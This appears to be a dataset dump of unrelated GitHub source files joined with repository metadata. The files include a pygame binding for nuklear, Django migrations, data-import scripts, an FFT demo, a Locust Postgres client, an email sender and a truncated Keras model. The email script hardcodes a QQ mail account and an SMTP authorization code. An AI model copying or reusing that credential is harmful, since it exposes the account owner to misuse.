cur.execute("INSERT OR IGNORE INTO Corona (state, peoplePositiveNewCasesCt, peopleNegativeNewCt, peopleDeathCt) VALUES (?, ?, ?, ?) ", getCoronaData(airportData[3]))
else:
print("Found Data for " + str(flight["origin"]["code"]) + " in DB. Bypassing Call to save API Limit")
conn.commit()
conn.close()
main() | [
"aguglani@umich.edu"
] | aguglani@umich.edu |
45ae02db652e3be0161f27e1c06dc8c4cd2cc2e5 | 11398875e4f5cbcadc1747e73049dc99bca26908 | /06-time/time-01.py | 7f952d5930c3c2ef4b13a8eec60178b112e90857 | [] | no_license | asvkarthick/LearnPython | 37910faab5c4a18d6e08eb304ca1da9649e5b18f | 258e8c567ca3c8802d5e56f20b34317eba4c75f3 | refs/heads/master | 2021-06-23T06:30:46.681369 | 2021-06-11T19:35:40 | 2021-06-11T19:35:40 | 149,719,196 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 143 | py | #!/usr/bin/python
# Author: Karthick Kumaran <asvkarthick@gmail.com>
import time
print('Sleeping for 2 seconds')
time.sleep(2)
print('Done')
| [
"asvkarthick@gmail.com"
] | asvkarthick@gmail.com |
5774620808faf3c0f1ee1fe1a5e2e6bc220a25a5 | b04156fa48dfcf08ec84a26671b3942e38da7ae6 | /plasmiddb/plasmid_database/migrations/0003_plasmidfile.py | dcad249fd6fd8d9b52ef7147906b769207347245 | [] | no_license | andrewng1023/PlasmidWebApp | 67f96f58cc3717a6d746c52da3c3a48cb5316a99 | 562aac9e7273fea70b284f4f29504ce9d4f44746 | refs/heads/master | 2023-07-18T19:16:51.521163 | 2021-05-11T05:24:34 | 2021-05-11T05:24:34 | 329,831,363 | 1 | 0 | null | 2021-05-14T07:11:22 | 2021-01-15T06:44:34 | JavaScript | UTF-8 | Python | false | false | 878 | py | # Generated by Django 3.0.7 on 2020-06-07 01:17
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('plasmid_database', '0002_auto_20200604_1819'),
]
operations = [
migrations.CreateModel(
name='PlasmidFile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('file', models.FileField(upload_to='')),
('filename', models.TextField()),
('description', models.TextField()),
('created', models.DateTimeField(auto_now_add=True)),
('plasmid', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='files', to='plasmid_database.Plasmid')),
],
),
]
| [
"james.lucas@berkeley.edu"
] | james.lucas@berkeley.edu |
2f86a501c2116cc1ba400e0cb3ce2532707ee09d | b307c310c4da7cb5182d0595790ee1e4cdacee81 | /pynk/nkpygame.py | f363f27bff14e5bb151c3c9261e13076b8e3fa7d | [] | no_license | nathanrw/nuklear-cffi | c7ca6af92482ef0476cd14730e6f0c94095b2164 | 173a5ec2a799e352dd6add86b6c300730e4bb0e0 | refs/heads/master | 2021-05-06T10:47:17.028830 | 2019-04-27T12:14:33 | 2019-04-27T12:14:33 | 114,173,114 | 41 | 6 | null | 2019-01-13T11:02:40 | 2017-12-13T21:56:33 | C | UTF-8 | Python | false | false | 15,629 | py | """
A library for interfacing with the nuklear C library from Python.
"""
import collections
import pygame
import unicodedata
from _nuklear import ffi, lib
@ffi.def_extern()
def pynk_text_width_callback(handle, height, text, text_length):
""" Text measurement callback. """
nkfont = ffi.from_handle(handle.ptr)
python_text = ffi.string(text, text_length)
return nkfont.text_width(height, python_text)
@ffi.def_extern()
def pynk_query_font_glyph_callback(handle, font_height, glyph, codepoint, next_codepoint):
""" Font glyph callback - for VBO outout. """
nkfont = ffi.from_handle(handle.ptr)
nkfont.query_glyph(font_height, glyph, codepoint, next_codepoint)
class NkFont(object):
""" Abstract class for a font compatible with nuklear. """
def height(self):
""" Get the height of the font. """
return 0
def text_width(self, height, text):
""" Measure a string of text. """
return 0
def query_glyph(self, height, glyph, codepoint, next_codepoint):
""" Obtain texture coordinates for a glyph. This is not necessary for
pygame software rendering - it will only be called if nk_convert() VBO
output is being used. """
# struct nk_user_font_glyph {
# struct nk_vec2 uv[2];
# /* texture coordinates */
# struct nk_vec2 offset;
# /* offset between top left and glyph */
# float width, height;
# /* size of the glyph */
# float xadvance;
# /* offset to the next glyph */
# };
glyph.uv[0].x = 0
glyph.uv[0].y = 0
glyph.uv[1].x = 0
glyph.uv[1].y = 0
glyph.offset.x = 0
glyph.offset.y = 0
glyph.width = 0
glyph.height = 0
glyph.xadvance = 0;
def get_texture_id(self):
""" Obtain a texture id for font rendering. If VBO output via
nk_convert() is not being used, then this is not necessary. """
return 0
def get_pygame_font(self):
""" Return a font that can be used as a pygame font for text rendering.
This is not necessary if pygame software rendering is not being used.
"""
return None
class NkPygameFont(NkFont):
""" Nuklear-compatible pygame font wrapper. """
def __init__(self, pygame_font):
""" Constructor. """
self.__pygame_font = pygame_font
NkFont.__init__(self)
def height(self):
""" Get the height of the text. """
return self.__pygame_font.get_height()
def text_width(self, height, text):
""" Measure a string of text. """
# Note: currently ignoring input height.
width, height = self.__pygame_font.size(text)
return width
def get_pygame_font(self):
""" Get the pygame font. """
return self.__pygame_font
class NkPygame(object):
"""
Manages a nuklear context integrated with pygame.
This class manages the lifetime of a nuklear context and takes care of
stitching it into pygame - it provides methods for consuming pygame input
and rendering to a pygame surface, and it sets up any required userdata
pointers in the context during initialisation.
However, this is not a high-level wrapper. You still need to call the
nuklear C API on the context, which is exposed via a property.
"""
class KeyMapping(object):
""" Maps a pygame key press to a nuklear key sequence. """
def __init__(self, pg, nk, pg_mod=pygame.KMOD_NONE):
""" Map (pg, pg_mod) -> nk, where pg_mod is an optional modifier that
defaults to KMOD_NONE. pg can be a sequence in which case both pygame
keys are mapped to the same thing. nk can be a sequence in which case
multiple nk keys are issued in response to the single pygame event. """
self.pgs = pg
if not isinstance(self.pgs, collections.Iterable):
self.pgs = [self.pgs]
self.nks = nk
if not isinstance(self.nks, collections.Iterable):
self.nks = [self.nks]
self.pg_mod = pg_mod
class KeyMap(object):
""" Mapping between pygame and nuklear key constants. """
def __init__(self, *keymappings):
""" Initialise the key map. """
self.__keys = {}
for mapping in keymappings:
for pg in mapping.pgs:
self.__keys.setdefault(pg, {})
self.__keys[pg][mapping.pg_mod] = mapping
def map_key(self, key, mod):
""" Return the nuklear key sequence corresponding to a pygame key+modifier. """
mapping = self.__keys.get(key, {}).get(mod, None)
if mapping is None:
mapping = self.__keys.get(key, {}).get(pygame.KMOD_NONE, None)
if mapping is not None:
return mapping.nks
return []
KEYMAP = KeyMap(
KeyMapping([pygame.K_RSHIFT, pygame.K_LSHIFT], lib.NK_KEY_SHIFT),
KeyMapping(pygame.K_DELETE, lib.NK_KEY_DEL),
KeyMapping(pygame.K_RETURN, lib.NK_KEY_ENTER),
KeyMapping(pygame.K_TAB, lib.NK_KEY_TAB),
KeyMapping(pygame.K_BACKSPACE, lib.NK_KEY_BACKSPACE),
KeyMapping(pygame.K_HOME, [lib.NK_KEY_TEXT_START, lib.NK_KEY_SCROLL_START]),
KeyMapping(pygame.K_END, [lib.NK_KEY_TEXT_END, lib.NK_KEY_TEXT_START]),
KeyMapping(pygame.K_PAGEDOWN, lib.NK_KEY_SCROLL_DOWN),
KeyMapping(pygame.K_PAGEUP, lib.NK_KEY_SCROLL_UP),
KeyMapping(pygame.K_z, lib.NK_KEY_TEXT_UNDO, pygame.KMOD_CTRL),
KeyMapping(pygame.K_r, lib.NK_KEY_TEXT_REDO, pygame.KMOD_CTRL),
KeyMapping(pygame.K_c, lib.NK_KEY_COPY, pygame.KMOD_CTRL),
KeyMapping(pygame.K_v, lib.NK_KEY_PASTE, pygame.KMOD_CTRL),
KeyMapping(pygame.K_x, lib.NK_KEY_CUT, pygame.KMOD_CTRL),
KeyMapping(pygame.K_b, lib.NK_KEY_TEXT_LINE_START, pygame.KMOD_CTRL),
KeyMapping(pygame.K_e, lib.NK_KEY_TEXT_LINE_END, pygame.KMOD_CTRL),
KeyMapping(pygame.K_UP, lib.NK_KEY_UP),
KeyMapping(pygame.K_DOWN, lib.NK_KEY_DOWN),
KeyMapping(pygame.K_LEFT, lib.NK_KEY_LEFT),
KeyMapping(pygame.K_LEFT, lib.NK_KEY_TEXT_WORD_LEFT, pygame.KMOD_CTRL),
KeyMapping(pygame.K_RIGHT, lib.NK_KEY_RIGHT),
KeyMapping(pygame.K_RIGHT, lib.NK_KEY_TEXT_WORD_RIGHT, pygame.KMOD_CTRL)
)
def __init__(self, font):
"""
Construct an uninitialised NkPygame instance.
'font' is the pygame font instance to use for the nuklear font.
The resulting instance will not yet be initialised - attempting to
get the context or do anything with it will result in exceptions being
thrown. To use the instance, setup() must be called. This can be
done manually or via a 'with' statement.
"""
self.__font = font
self.__font_handle = ffi.new_handle(font)
self.__nuklear_font = ffi.new("struct nk_user_font*")
self.__nuklear_font.userdata.ptr = self.__font_handle
self.__nuklear_font.height = self.__font.height()
self.__nuklear_font.width = lib.pynk_text_width_callback
self.__nuklear_font.query = lib.pynk_query_font_glyph_callback
self.__nuklear_font.texture.id = self.__font.get_texture_id()
self.__ctx = None
@property
def ctx(self):
""" Get the nuklear context. It must have been initialised via setup() first. """
if self.__ctx is None:
raise Exception("The nuklear context has not been initialised.")
return self.__ctx
def setup(self):
""" Initialise the nuklear context. """
if self.__ctx is None:
self.__ctx = ffi.new("struct nk_context*")
lib.nk_init_default(self.__ctx, self.__nuklear_font)
def teardown(self):
""" Tear down the nuklear context. """
if self.__ctx is not None:
lib.nk_free(self.__ctx)
self.__ctx = None
def __enter__(self):
"Support 'with' statement."
self.setup()
return self
def __exit__(self, type, value, traceback):
"Support 'with' statement."
self.teardown()
def handle_events(self, events):
""" Handle a sequence of pygame events. """
lib.nk_input_begin(self.ctx)
for e in events:
self.handle_event(e)
lib.nk_input_end(self.ctx)
def handle_event(self, e):
""" Map a pygame event to nuklear input. """
if e.type == pygame.KEYDOWN or e.type == pygame.KEYUP:
consumed = False
down = e.type == pygame.KEYDOWN
for nk_key in NkPygame.KEYMAP.map_key(e.key, e.mod):
lib.nk_input_key(self.ctx, nk_key, down)
consumed = True
if not consumed and down and len(e.unicode) == 1:
# Note: should pass unicode directly, but need to
# convert wchar_t (which is what cffi converts to)
# to int or char[4]. wchar_t is 2 bytes on windows
# for utf-16
if unicodedata.category(e.unicode)[0] != "C":
char = str(e.unicode)
if len(char) == 1:
lib.nk_input_char(self.ctx, str(e.unicode))
elif e.type == pygame.MOUSEBUTTONDOWN or e.type == pygame.MOUSEBUTTONUP:
down = e.type == pygame.MOUSEBUTTONDOWN
button = lib.NK_BUTTON_LEFT
if e.button == 1:
button = lib.NK_BUTTON_LEFT
elif e.button == 3:
button = lib.NK_BUTTON_RIGHT
lib.nk_input_button(self.ctx, button, e.pos[0], e.pos[1], down)
elif e.type == pygame.MOUSEMOTION:
lib.nk_input_motion(self.ctx, e.pos[0], e.pos[1])
def render_to_surface(self, screen):
"""
Render the nuklear context to a pygame surface.
'screen' is a pygame surface. This function will set the clip region and
result in the clip region being set to None.
"""
nuklear_command = lib.nk__begin(self.ctx)
while nuklear_command:
if nuklear_command.type == lib.NK_COMMAND_NOP:
pass
elif nuklear_command.type == lib.NK_COMMAND_SCISSOR:
c = ffi.cast("struct nk_command_scissor*", nuklear_command)
rect = pygame.Rect(c.x, c.y, c.w, c.h)
screen.set_clip(rect)
elif nuklear_command.type == lib.NK_COMMAND_LINE:
c = ffi.cast("struct nk_command_line*", nuklear_command)
pygame.draw.line(screen,
(c.color.r, c.color.g, c.color.b),
(c.begin.x, c.begin.y),
(c.end.x, c.end.y),
c.line_thickness)
elif nuklear_command.type == lib.NK_COMMAND_RECT:
c = ffi.cast("struct nk_command_rect*", nuklear_command)
rect = pygame.Rect(c.x, c.y, c.w, c.h)
colour = (c.color.r, c.color.g, c.color.b)
# c.rounding - unsupported.
pygame.draw.rect(screen, colour, rect, c.line_thickness)
elif nuklear_command.type == lib.NK_COMMAND_RECT_FILLED:
c = ffi.cast("struct nk_command_rect_filled*", nuklear_command)
rect = pygame.Rect(c.x, c.y, c.w, c.h)
colour = (c.color.r, c.color.g, c.color.b)
# c.rounding - unsupported.
pygame.draw.rect(screen, colour, rect, 0)
elif nuklear_command.type == lib.NK_COMMAND_CIRCLE:
c = ffi.cast("struct nk_command_circle*", nuklear_command)
rect = pygame.Rect(c.x, c.y, c.w, c.h)
colour = (c.color.r, c.color.g, c.color.b)
pygame.draw.ellipse(screen, colour, rect, c.line_thickness)
elif nuklear_command.type == lib.NK_COMMAND_CIRCLE_FILLED:
c = ffi.cast("struct nk_command_circle_filled*", nuklear_command)
rect = pygame.Rect(c.x, c.y, c.w, c.h)
colour = (c.color.r, c.color.g, c.color.b)
pygame.draw.ellipse(screen, colour, rect, 0)
elif nuklear_command.type == lib.NK_COMMAND_TRIANGLE:
c = ffi.cast("struct nk_command_triangle*", nuklear_command)
points = [(c.a.x, c.a.y), (c.b.x, c.b.y), (c.c.x, c.c.y)]
colour = (c.color.r, c.color.g, c.color.b)
pygame.draw.polygon(screen, colour, points, c.line_thickness)
elif nuklear_command.type == lib.NK_COMMAND_TRIANGLE_FILLED:
c = ffi.cast("struct nk_command_triangle_filled*", nuklear_command)
points = [(c.a.x, c.a.y), (c.b.x, c.b.y), (c.c.x, c.c.y)]
colour = (c.color.r, c.color.g, c.color.b)
pygame.draw.polygon(screen, colour, points, 0)
elif nuklear_command.type == lib.NK_COMMAND_POLYGON:
c = ffi.cast("struct nk_command_polygon*", nuklear_command)
unpacked = ffi.unpack(c.points, c.point_count)
points = [(p.x, p.y) for p in unpacked]
colour = (c.color.r, c.color.g, c.color.b)
pygame.draw.polygon(screen, colour, points, c.line_thickness)
elif nuklear_command.type == lib.NK_COMMAND_POLYGON_FILLED:
c = ffi.cast("struct nk_command_polygon_filled*", nuklear_command)
unpacked = ffi.unpack(c.points, c.point_count)
points = [(p.x, p.y) for p in unpacked]
colour = (c.color.r, c.color.g, c.color.b)
pygame.draw.polygon(screen, colour, points, 0)
elif nuklear_command.type == lib.NK_COMMAND_POLYLINE:
c = ffi.cast("struct nk_command_polyline*", nuklear_command)
unpacked = ffi.unpack(c.points, c.point_count)
points = [(p.x, p.y) for p in unpacked]
colour = (c.color.r, c.color.g, c.color.b)
pygame.draw.polygon(screen, colour, points, c.line_thickness)
elif nuklear_command.type == lib.NK_COMMAND_TEXT:
c = ffi.cast("struct nk_command_text*", nuklear_command)
font = ffi.from_handle(c.font.userdata.ptr)
pygame_font = font.get_pygame_font()
if pygame_font is not None:
text = ffi.string(c.string, c.length)
fg_colour = (c.foreground.r, c.foreground.g, c.foreground.b)
bg_colour = (c.background.r, c.background.g, c.background.b)
rect = pygame.Rect(c.x, c.y, c.w, c.h)
rendered = pygame_font.render(text, True, fg_colour, bg_colour)
screen.blit(rendered, rect.topleft)
elif nuklear_command.type == lib.NK_COMMAND_CURVE:
pass
elif nuklear_command.type == lib.NK_COMMAND_RECT_MULTI_COLOR:
pass
elif nuklear_command.type == lib.NK_COMMAND_IMAGE:
pass
elif nuklear_command.type == lib.NK_COMMAND_ARC:
pass
elif nuklear_command.type == lib.NK_COMMAND_ARC_FILLED:
pass
else:
raise Exception("Unknown nuklear command type.")
nuklear_command = lib.nk__next(self.ctx, nuklear_command)
# Reset the clipping.
screen.set_clip(None)
| [
"nathanrichardwoodward@gmail.com"
] | nathanrichardwoodward@gmail.com |
99d94813e88422173ededc851fc34356be9ae9fa | c5765671f488bad98e8a9458aa68a0d1bacb8bcb | /ingresar_instituciones.py | 6e426db1e65730a9fef883c91b42ef87c386935a | [] | no_license | PlataformasWeb-P-AA2021/trabajo-final-1bim-BrandonVS | de7b654c9b48add233e6ca303fda8b6bde821866 | 59489f8c508d3a412fc2b1583784b6419df34d0f | refs/heads/main | 2023-04-20T10:56:01.512136 | 2021-05-30T19:53:35 | 2021-05-30T19:53:35 | 371,237,758 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,522 | py | import csv
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from generar_tablas import Institucion, Parroquia
from configuracion import cadena_base
# Se genera el enlace al gestor de base de datos usando la variable creada en configuracion
engine = create_engine(cadena_base)
Session = sessionmaker(bind=engine)
session = Session()
# Se abre el archivo donde se encuentran todos los datos
read = open('data/Listado-instituciones-Educativas.csv', 'r', encoding='utf-8')
# Se lo lee y guarda como un csv usando la libreria csv de python
csv = csv.reader(read, delimiter='|')
# Se salta el encabezado
next(csv)
# Se guarda cada una de las lineas del csv en una lista
institucion_csv = list(csv)
cont = 0
# Se guardan en una tupla solamente las columnas necesarias para instituciones
for row in institucion_csv:
institucion_csv[cont] = tuple(row[i] for i in [0, 1, 6, 8, 9, 10, 11, 12, 13, 14, 15])
cont += 1
# Se eliminan los duplicados con el metodo set() y se lo vuelve a declarar como lista para mayor facilidad
instituciones = list(set(institucion_csv))
# Se guardan los datos en la tabla Institucion
for i in instituciones:
i = Institucion(institucion_id=i[0], inst_name=i[1], distrito=i[3], sostenimiento=i[4], tipo_edu=i[5],
modalidad=i[6], jornada=i[7], acceso=i[8], n_estudiantes=int(i[9]), n_profesores=int(i[10]),
parroquia=session.query(Parroquia).filter_by(parroquia_id=i[2]).one())
session.add(i)
session.commit()
| [
"vegasotobrandon@yahoo.com"
] | vegasotobrandon@yahoo.com |
83774ee8ba86d36addb91c1a11753509b4785fd5 | 16a2ac198a36d7633c62d41f4604356cd0ae732e | /Au-public-master/iron/utilities/rename_to_pacbio.py | 7b73810b42d4d374c9af78099e87739af78271c2 | [
"Apache-2.0"
] | permissive | Dingjie-Wang/Manual-for-running-IDP-pipeline | f433ba5b0dbd44da5a9d8836b3e29a27e12a48c4 | 6c2756e10184f0b8f0e5872a358378e90f1729b0 | refs/heads/master | 2021-06-29T04:02:56.741203 | 2020-12-07T17:39:05 | 2020-12-07T17:39:05 | 201,325,604 | 1 | 7 | null | null | null | null | UTF-8 | Python | false | false | 1,878 | py | #!/usr/bin/python
import sys,argparse
from SequenceBasics import FastaHandleReader, FastqHandleReader
def main():
parser = argparse.ArgumentParser()
parser.add_argument('input',help="Use - for STDIN")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('--fasta',action='store_true')
group.add_argument('--fastq',action='store_true')
group.add_argument('--gpd',action='store_true')
parser.add_argument('--output_table',help='save coversion to file')
parser.add_argument('-o','--output')
args = parser.parse_args()
if args.input=='-': args.input = sys.stdin
else: args.input= open(args.input)
if args.output: args.output = open(args.output,'w')
if args.output_table: args.output_table= open(args.output_table,'w')
else: args.output = sys.stdout
if args.gpd:
z = 0
for line in args.input:
f = line.rstrip().split("\t")
z+=1
name = 'm150101_010101_11111_c111111111111111111_s1_p0/'+str(z)+'/ccs'
if args.output_table: args.output_table.write(f[0]+"\t"+name+"\n")
f[0] = name
f[1] = name
args.output.write("\t".join(f)+"\n")
args.output.close()
if args.output_table:
args.output_table.close()
return
if args.fasta:
args.input = FastaHandleReader(args.input)
elif args.fastq:
args.input = FastqHandleReader(args.input)
z = 0
while True:
e = args.input.read_entry()
if not e: break
z+=1
name = 'm150101_010101_11111_c111111111111111111_s1_p0/'+str(z)+'/ccs'
if args.fastq:
args.output.write( '@'+name+"\n"+ e['seq']+"\n"+ '+'+e['qual']+"\n")
elif args.fasta:
args.output.write('>'+name+"\n"+e['seq']+"\n")
if args.output_table: args.output_table.write(e['name']+"\t"+name+"\n")
args.output.close()
if args.output_table: args.output_table.close()
if __name__=="__main__":
main()
| [
"wan251@osumc.edu"
] | wan251@osumc.edu |
f06431d13f551b2af20f90fdde428236b8cc7d8d | cf8b9a860bdce11bc32bece7595db8b5af397968 | /Activities/migrations/0002_auto_20170921_1411.py | 4ba80207af6f940a09eb0129b7a5eb112fc65cca | [] | no_license | BhumitThakkar/JalaBapa_Website-Python | 9e425a18ddd2b9b46ea3a051dec81f9f429efb40 | 36210b39584950eb1eeed11d018345db81ff41ed | refs/heads/master | 2020-03-18T03:18:02.211978 | 2018-05-21T21:36:02 | 2018-05-21T21:36:02 | 134,233,495 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,115 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-09-21 19:11
from __future__ import unicode_literals
from django.db import migrations, models
import multiselectfield.db.fields
class Migration(migrations.Migration):
dependencies = [
('Activities', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='activities',
name='poster',
field=models.FileField(null=True, upload_to=''),
),
migrations.AlterField(
model_name='activities',
name='status',
field=models.CharField(choices=[('Past', 'Past'), ('Current', 'Current'), ('Upcoming', 'Upcoming')], max_length=10, null=True),
),
migrations.AlterField(
model_name='activities',
name='week_days',
field=multiselectfield.db.fields.MultiSelectField(choices=[('Sunday', 'Sunday'), ('Monday', 'Monday'), ('Tuesday', 'Tuesday'), ('Wednesday', 'Wednesday'), ('Thursday', 'Thursday'), ('Friday', 'Friday'), ('Saturday', 'Saturday')], max_length=56, null=True),
),
]
| [
"thakkarbhumit.1@gmail.com"
] | thakkarbhumit.1@gmail.com |
3c08dbf8205234af453c36af0cbb88df3835928a | f01ddf9bb2aed0a6dd761856efa52a80d7c1458f | /AprendizajeAutomatico/Practica2/codigoPC/daq2/FFTTest.py | 2d64621224bddc343bea0b0d881f8b2285a773ec | [] | no_license | luisf10/MCCP | 7fcf07a180253851ffea6b7517dd746fddd47aba | 884c0782a889ffa70a59ca06fce1bb0b418d982b | refs/heads/main | 2023-04-26T19:50:14.467402 | 2021-05-17T07:22:12 | 2021-05-17T07:22:12 | 346,027,749 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 787 | py | #LINK: https://www.youtube.com/watch?v=O0Y8FChBaFU&t=782s
import numpy as np
import matplotlib.pyplot as plt
Fs=2000
tstep=1/Fs
fo=100 #signal freq
N=int(10*Fs/fo) #number of samples
t=np.linspace(0,(N-1)*tstep,N) #time steps
fstep=Fs/N #freq interval
f=np.linspace(0,(N-1)*fstep,N)
y=1*np.sin(2*np.pi*fo*t) + 1*np.sin(2*np.pi*3*fo*t)
print("long de y={0}, N={1}".format(len(y),N))
#..Perform plot:...............
X=np.fft.fft(y)
X_mag=np.abs(X)/N
#...FFT for graphic:...
f_plot=f[0:int(N/2+1)]
X_mag_plot=2*X_mag[0:int(N/2+1)]
X_mag_plot[0]=X_mag_plot[0]/2 #Note:DC components does not need to multiply by 2
#.........Graphic
fig,[ax1,ax2] = plt.subplots(nrows=2,ncols=1)
ax1.plot(t,y,'.-')
ax2.plot(f_plot,X_mag_plot,'.-')
plt.grid('on')
plt.show()
| [
"noreply@github.com"
] | luisf10.noreply@github.com |
788ba68bb541eb2b7cf33cc4827202b39f5bc269 | 059c3bb5e0e8552f09768c3442b7af8614ca72f6 | /Lab7/CodingBat/Warmup-1/front_back.py | 8672e8714a693fbf13134795ee19b9c062298ddc | [] | no_license | tdinaraa/WebDev | 04ac88369cdf14e199841caf08a90723e73b4ccf | b99bdb93756b6a63b2835c0eee5b8d24309f7e00 | refs/heads/master | 2023-01-22T08:32:06.405670 | 2020-04-22T04:32:53 | 2020-04-22T04:32:53 | 240,984,305 | 0 | 0 | null | 2023-01-07T21:54:04 | 2020-02-16T23:41:57 | null | UTF-8 | Python | false | false | 147 | py | def front_back(str):
if len(str) <= 1:
return str
mid = str[1:-1]
f = str[0]
l = str[len(str) - 1]
return l + mid + f | [
"45028995+tdinaraa@users.noreply.github.com"
] | 45028995+tdinaraa@users.noreply.github.com |
4622243a0d9aaf94e1770a284c8ba2b006e76181 | 40d932cf54364808d1f752d411a2d030d92bd5e2 | /docker-image/locust-tasks/postgres_client.py | 3e7c356cb2af4940bd1506bbba647dd318c63e38 | [
"Apache-2.0"
] | permissive | yroket/distributed-load-testing-using-kubernetes | 7fa417ef86f16b05ce5ba11f715bdfcae6124fe8 | ed2b83d942cbb1c6ddab1789d7cf4d9076ea151e | refs/heads/master | 2021-10-20T03:41:22.853456 | 2019-02-25T12:50:25 | 2019-02-25T12:50:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,267 | py | import time
from locust import events
from sqlalchemy import create_engine
from sqlalchemy.engine import url
from sqlalchemy import event
from argparse import ArgumentParser
class PostgresClient:
# def __init__(self, host, port, dbname, user, password,
# request_type='pg8000', pool_size=1, max_overflow=0):
def __init__(self, connection_string, request_type='pg8000'):
self.request_type = request_type
self.engine = create_engine(connection_string)
# self.engine = create_engine(url.URL(**database_connection_params),
# pool_size=pool_size, max_overflow=max_overflow,
# isolation_level="AUTOCOMMIT"
# )
# def __handle_success(self, *arguments, **kwargs):
# end_time = time.time()
# elapsed_time = int((end_time - kwargs["start_time"]) * 1000)
# try:
# record_metadata = kwargs["future"].get(timeout=1)
#
# request_data = dict(request_type="send",
# name=record_metadata.topic,
# response_time=elapsed_time,
# response_length=record_metadata.serialized_value_size)
#
# self.__fire_success(**request_data)
# except Exception as ex:
# print("Logging the exception : {0}".format(ex))
# raise # ??
#
# def __handle_failure(self, *arguments, **kwargs):
# print("failure " + str(locals()))
# end_time = time.time()
# elapsed_time = int((end_time - kwargs["start_time"]) * 1000)
#
# request_data = dict(request_type="send", name=kwargs["topic"], response_time=elapsed_time,
# exception=arguments[0])
#
# self.__fire_failure(**request_data)
#
# def __fire_failure(self, **kwargs):
# events.request_failure.fire(**kwargs)
#
# def __fire_success(self, **kwargs):
# events.request_success.fire(**kwargs)
def send(self, name, query, values=None):
start_time = time.time()
try:
result = self.engine.execute(query, values)
# self.__handle_success(start_time, future = future)
total_time = int((time.time() - start_time) * 1000)
events.request_success.fire(request_type=self.request_type, name=name, response_time=total_time,
response_length=len(str(result)))
return result
except Exception as e:
print('Exception occurred: ' + str(e))
# self.__handle_failure(start_time=start_time, topic=topic)
total_time = int((time.time() - start_time) * 1000)
events.request_failure.fire(request_type=self.request_type, name=name, response_time=total_time,
exception=e)
# future.add_callback(self.__handle_success, start_time=start_time, future=future)
# future.add_errback(self.__handle_failure, start_time=start_time, topic=topic)
def finalize(self):
print("flushing the messages")
# self.producer.flush(timeout=5)
print("flushing finished")
| [
"ygolan@Ygolan-6830.local"
] | ygolan@Ygolan-6830.local |
0acc131c78b11be11c1de6b9132faa40c9935bb7 | 0be96465a1c0acd6b5a29080ca75a56d7d2c88a8 | /mailv03.py | 0e2be9b67e235814d4452af07fec97fe2f18c7ec | [] | no_license | KenZP/tulingxueyuan | 975dd9d92127005d89e69ec063efac83e71d5910 | 458ebc9aabe3a0854141c7f1ad6a7a0c3d58ecae | refs/heads/master | 2020-05-05T14:05:39.882969 | 2019-05-08T07:06:13 | 2019-05-08T07:06:13 | 180,106,816 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,396 | py | import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEBase,MIMEMultipart
mail_mul = MIMEMultipart()
mail_text = MIMEText("hello, i am ......","plain","utf-8")
mail_mul.attach(mail_text)
with open("02.html", "rb") as f:
s = f.read()
m = MIMEText(s,'base64',"utf-8")
m["Content-Type"] = "application/octet-stream"
m["Content-Disposition"] = "attachment; filename='02.html'"
mail_mul.attach(m)
#发送wmail地址
from_addr = "1366798119@qq.com"
#此处密码是经过申请设置后的授权码,不是邮箱密码
from_pwd = "hjpovygcxmrshhcj"
to_addr = "1366798119@qq.com"
#输入SMTP服务器地址
#此处根据不同的邮件服务商有不同的值
#现在基本上任何一家邮件服务商,如果采用第三方收发邮件,都需要开启授权选项
#腾讯qq邮箱用的smtp地址是smtp.qq.com
smtp_srv = "smtp.qq.com"
try:
# 两个参数
# 第一个参数是服务器地址,但一定是bytes格式,需要编码
# 第二个参数是服务器的接受访问端口
srv = smtplib.SMTP_SSL(smtp_srv.encode(),465) #SMTP默认端口25
#登陆发送邮箱
srv.login(from_addr,from_pwd)
# 发送邮件
# 三个参数
# 1.发送地址
# 2.接收地址,必须是list形式
# 3.发送内容,作为字符串发送
srv.sendmail(from_addr,[to_addr],mail_mul.as_string())
srv.quit()
except Exception as e:
print(e)
| [
"398984762@qq.com"
] | 398984762@qq.com |
e9162ffce76e6cb45f8be7473bdfb2cc410f65fd | 007d72285632bb7c48adf52dab62093f4d3fcb6e | /model.py | 568caa7301a28fb2e77b01495d5977dec5ec93d7 | [] | no_license | hzwfl2/dilute-pooling-network | 497cd0a9afd92532c3a47e00621c7a4c1f8b8f37 | b65c1a222bcefb764ac4e8b4a4de05cafc2430d1 | refs/heads/master | 2020-06-23T20:32:32.952874 | 2019-07-08T12:18:42 | 2019-07-08T12:18:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,401 | py | # model script
"""
@author: mengxue.Zhang
"""
from keras.models import Model
from keras.optimizers import Adam
from keras import losses
from keras.layers import Dropout, Activation, add, Input, Concatenate , Lambda, Reshape
from keras.layers import Conv2D, MaxPooling2D
image_shape=[88, 88]
channel = 1
padding = 'valid'
def get_model(classes=10, lr=0.001):
while True:
model = DP_model(width=image_shape[0], height=image_shape[1], channel=channel, classes=classes)
optimizer = Adam(lr=lr, decay=0.0)
model.compile(loss=losses.sparse_categorical_crossentropy, optimizer=optimizer, metrics=['accuracy'])
yield model
def DP_model(width, height, channel, classes):
inpt = Input(shape=(width, height, channel), name='0_input')
x = Conv2D(16, kernel_size=(5, 5), padding=padding, activation='relu', name='1_conv')(inpt)
x = Rectified_Pooling(inpt=x, filters=16, couple=False)
x = Conv2D(32, kernel_size=(5, 5), padding=padding, activation='relu', name='2_conv')(x)
x = Rectified_Pooling(inpt=x, filters=32, couple=False)
x = Conv2D(64, kernel_size=(6, 6), padding=padding, activation='relu', name='3_conv')(x)
x = Rectified_Pooling(inpt=x, filters=64, couple=True)
x = Conv2D(128, kernel_size=(5, 5), padding=padding, activation='relu', name='4_conv')(x)
x = Dropout(rate=0.5)(x)
